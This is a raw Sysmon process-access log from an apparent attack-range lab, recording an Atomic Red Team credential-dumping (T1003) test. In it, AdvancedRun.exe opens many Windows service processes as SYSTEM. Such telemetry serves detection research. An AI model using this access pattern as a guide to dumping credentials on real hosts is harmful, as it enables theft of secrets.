17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 